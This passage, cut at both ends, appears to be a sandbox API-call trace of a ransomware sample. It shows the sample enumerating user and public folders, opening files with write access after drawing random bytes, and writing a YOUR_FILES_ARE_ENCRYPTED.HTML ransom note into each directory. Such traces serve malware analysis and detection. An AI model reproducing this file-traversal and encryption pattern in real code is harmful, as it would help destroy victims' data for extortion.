RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.842] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=380) returned 1 [0110.842] CloseHandle (hObject=0x304) returned 1 [0110.842] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.842] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0110.842] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 55 [0110.842] GetProcessHeap () returned 0x600000 [0110.842] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.842] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.843] CloseHandle (hObject=0x314) returned 1 [0110.844] GetProcessHeap () returned 0x600000 [0110.844] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.844] GetProcessHeap () returned 0x600000 [0110.844] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.844] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Pictures", cAlternateFileName="")) returned 1 [0110.844] StrStrIW (lpFirst="Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.844] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0110.844] GetProcessHeap () returned 0x600000 [0110.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.845] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0110.845] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*" [0110.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.845] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.845] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.845] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.845] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0110.845] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.845] lstrlenW (lpString=".ini") returned 4 [0110.845] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.845] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.847] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=380) returned 1 [0110.848] CloseHandle (hObject=0x304) returned 1 [0110.848] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.848] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.848] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0110.848] GetProcessHeap () returned 0x600000 [0110.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.849] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.850] CloseHandle (hObject=0x314) returned 1 [0110.851] GetProcessHeap () returned 0x600000 [0110.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.851] GetProcessHeap () returned 0x600000 [0110.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.851] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 1 [0110.851] StrStrIW (lpFirst="Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.851] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0110.851] GetProcessHeap () returned 0x600000 [0110.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.853] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0110.853] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*" [0110.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.853] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.853] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.853] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.853] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0110.853] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.853] lstrlenW (lpString=".ini") returned 4 [0110.853] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.853] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.854] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=380) returned 1 [0110.854] CloseHandle (hObject=0x304) returned 1 [0110.854] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.854] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.854] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0110.854] GetProcessHeap () returned 0x600000 [0110.854] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.855] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.856] CloseHandle (hObject=0x314) returned 1 [0110.856] GetProcessHeap () returned 0x600000 [0110.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.856] GetProcessHeap () returned 0x600000 [0110.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.857] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 0 [0110.857] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.857] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0110.857] GetProcessHeap () returned 0x600000 [0110.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3173dd8 [0110.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0110.858] WriteFile (in: hFile=0x300, lpBuffer=0x3173dd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x3173dd8*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.861] CloseHandle (hObject=0x300) returned 1 [0110.861] GetProcessHeap () returned 0x600000 [0110.861] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.861] GetProcessHeap () returned 0x600000 [0110.861] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.862] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 1 [0110.862] StrStrIW (lpFirst="RDhJ0CNFevzX", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.862] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX") returned 25 [0110.862] GetProcessHeap () returned 0x600000 [0110.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.863] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX" [0110.863] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\*" [0110.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.864] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0110.864] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="AppData", cAlternateFileName="")) returned 1 [0110.864] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.864] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData") returned 33 [0110.864] GetProcessHeap () returned 0x600000 [0110.864] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.865] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData" [0110.865] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\*" [0110.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.865] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0110.865] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="Local", cAlternateFileName="")) returned 1 [0110.865] StrStrIW (lpFirst="Local", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.865] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 39 [0110.865] GetProcessHeap () returned 0x600000 [0110.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.867] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0110.867] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*" [0110.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623af8, dwReserved1=0x6265c0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.867] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623af8, dwReserved1=0x6265c0, cFileName="..", cAlternateFileName="")) returned 1 [0110.867] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623af8, dwReserved1=0x6265c0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0110.867] StrStrIW (lpFirst="ActiveSync", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.867] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync") returned 50 [0110.867] GetProcessHeap () returned 0x600000 [0110.867] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.868] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync" [0110.868] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*" [0110.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, 